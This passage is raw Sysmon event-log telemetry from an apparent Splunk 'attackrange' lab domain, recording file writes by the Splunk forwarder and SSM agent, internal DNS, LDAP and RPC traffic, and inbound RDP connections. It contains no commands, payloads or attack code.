Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9070B8C93D8374A4FD24D1D0D17365F3,SHA256=C9C390D2A5EDE5FDAB4D142461203526C9EF16B9B3133DCFA3430D07256B46A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:09.823{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5162C5705FE385ACFFA2C13D3D20AD46,SHA256=305DAF2EA5B57281E1668DB7768D0E92FBD613223C610197522DFA7260E3ED51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:10.964{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BF279BB61B51AF934383D117C10644,SHA256=AF56658BAF7FB2943BF6B5D92A62310F5D48C6494B11BD925F91CE0B56C3CC33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:07.767{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59506-false10.0.1.12-8000- 23542300x8000000000000000980711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:10.114{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E79C3C73DB43AFB7D6CE84CD833EED9,SHA256=7B7A8B4392FB565A9403A6AEBAE88270E3DCB7D58B0B88A7F831C824A6734B3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:08.656{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54839-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001054916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:08.232{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54191-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:10.026{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD64F8D7BE2E0127F6FA348FF0E9CB0F,SHA256=E76799B7F2AAB051A60B33160E1488057558440779B736064E999B0D023286EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:11.964{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C0DF575BD5F32FB85A617C035EA1E69,SHA256=A05E945606142A6951466D569D09BEC99898855FEA28C21791AA83B65613C928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:11.348{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742BBC0C68AE78D3E95CB79478E21618,SHA256=E8E5B6AC67F213946F089073A5FC373CFB9F2375866DBC5BC42DEE38D4DF0647,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:09.321{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com38705-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000980716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:12.707{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8497AE6059A6F88117C509C0A3727B7E,SHA256=C8F8FCA7B4E9B81D0C26389DF1EA4D4CB5ADB28918862D6869B801B5EE0F88F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:12.707{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A83662325831A7F7CA7A2E15278E7C2,SHA256=1E7182DF51EE6225BABBA89FEB2408D02B9014106E994E885E6EA03ECC922CBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:12.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF5E78C99745CB15CA36556EB6028774,SHA256=EE802B4ECBC13D9F4C0E5B24F581CCA749E52B56A61CEF31278EE88F81DEE3DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:10.841{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62002- 23542300x80000000000000001054921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:13.058{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F62D20E7DF090547E1FE482200FD234,SHA256=D7FFD4DE12FD0E07FF854D83C9129F6AA8C69341CE939098815950B7808445EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:13.879{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:10.006{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64979-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:13.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF4ED23F288B975C6BA359CF2588459B,SHA256=90994C0519B82A0B943EF2AF5B9227CEC6BFB6794781A875C5E39805047A0CAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:14.278{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D47278430E5D284A3DE8726602FAED,SHA256=1BFB0FFAA85123FB1EB9427E1272C3E4FD1EFBB69E61FFBB2B9A2C361983B273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:14.379{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E369B11C0DCD71AE16F3D1067C38B392,SHA256=1DD9DE99423FC620D670227E348ACA64ED84BF2AE6A27B7DFBB6A49CC534AD84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:15.622{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D14D796EB881BDA27E95A285DBC6AA,SHA256=99673A2D8B4D26726C6A3CD15601C2083AE608DBB9E6785E77526E0B0B1C8C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:15.622{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=118DB07D7BF4E8A92E5EC559FA26736B,SHA256=93E3B850181E00A480904BC4B48C7634ED96945B31E63C5D5F3ED703516364B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:15.450{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643EEECF5189910F69E08B129CD3959C,SHA256=DB2038D0889EFB19ADD15FB69236FFA714940255FFA33FD21476DCA0564675AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:12.502{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59507-false10.0.1.12-8089- 354300x8000000000000000980723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:12.037{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.155.197.221-49824-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:15.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77777618E2A9DA1EF34BA739AA24C3CD,SHA256=B5346EFD5E74C2E5407787BF8E2530711CCB323B09E8981535183823779AE551,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:13.743{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.155.197.221-49991-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000980721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:15.207{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8497AE6059A6F88117C509C0A3727B7E,SHA256=C8F8FCA7B4E9B81D0C26389DF1EA4D4CB5ADB28918862D6869B801B5EE0F88F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:16.638{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88852926033A602D731D66DD5B53319,SHA256=1278A661237D6F87D40C552130E3180FFAD616FD12AFF73DDBAA97B763C272C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:13.689{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59508-false10.0.1.12-8000- 23542300x8000000000000000980725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:16.411{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE1E2194141C8C271997E5E3A680965D,SHA256=87FB4D4B6EA64E2634B899FAD2209F385739859FC9B5AE1C74791EEF90B7E04B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:14.139{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54192-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.873{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087508AC0FF4BF670814C271BCDAF843,SHA256=6E9D735FAC410F586C87CF30927715C3EB8FCD964C0BAE257D30CF317A84BF5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:17.691{69CF5F33-7F27-614D-0B00-00000000FD01}624NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.ftlMD5=3B6EA360654F70E0684F0FF337684098,SHA256=2680BC968E5418E2F3DE2DB910AF27C15725D69948A6AF785B6C4BF2CE11680C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:17.528{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47D4529CA3A5A77B92B0E11F317E0E9,SHA256=0127D7BCC45AF854BE433D5B2C0A381FEA86B4013164A9DD4D46BC1C4B892632,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:17.526{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4317MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.623{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=24E9550188D75386BF71D51730608DA7,SHA256=D182BC083FD69CF3A2F854BF382F5807A1B05C9CC855ABE2B514210CA8E8D8D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.623{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94835CF5AB3A121407DBFE294E1C31C7,SHA256=C6E6C44387DCEFFA8C16EC3B6FDD9EFA7D6C2D4A954A4748A5980A3E2CB489A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:18.736{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C2CB2BD08F90958148BE69802E3D9A,SHA256=3E8824900B575683AB9F648CD2E46BC1843E2F45905C74D5DD892EEF16DC9194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:18.677{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-000MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:18.721{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B72774A516DD62B8FBBA3630BE777CF5,SHA256=F6AF6E11458E440C3E0CD8A2925C51277C025D74588DC1C4ADBE1BCBA87E1CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:18.536{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4318MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:19.676{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-001MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.532{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15WIN-HOST-54259510-false10.0.1.14win-dc-429.attackrange.local49672- 354300x80000000000000001054937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.530{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse10.0.1.15WIN-HOST-54259509-false10.0.1.14win-dc-429.attackrange.local135epmap 354300x80000000000000001054936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.414{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local389-false10.0.1.15WIN-HOST-54257856- 354300x80000000000000001054935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:17.413{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15WIN-HOST-54257855- 23542300x80000000000000001054934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:19.066{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84607A4278C8497D68E5C049F52975C7,SHA256=942E306814DBE37D905E6DD8C17FB061E97DA1C2A92DC78FDF73907B5EB008FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:19.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3ECD853408DDEF125E9B9C34C4A9D94C,SHA256=EAE16D69027692BFEE748DE082B73FB33F50616F19364EDE7576C8CDE985081F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:19.739{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912BC17912940FA4491326CF88EDA26A,SHA256=FDDE0C896DC161615118279663520F81D01785AAD9132C4EF991F6F26070EDBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:16.330{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59509-false10.0.1.14-135epmap 354300x8000000000000000980734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:16.214{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-542.attackrange.local57856-false10.0.1.14-389- 354300x8000000000000000980733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:15.596{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60079-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001054940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:20.286{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F73F75DDDC908D2298FA0EA7A749494,SHA256=576E74A49E99FE88270FF75C55763AD4690CEE2ABF5627B7FF0AC088BD0CF4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:20.755{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB9416818BE0DC61C6AD97FA91CB1512,SHA256=954B174C26E7E06C81C008462AB78527865DDA5B522ADE69F90039E5EEBC0678,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:16.358{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60477-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:16.333{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59510-false10.0.1.14-49672- 23542300x80000000000000001054941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:21.521{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 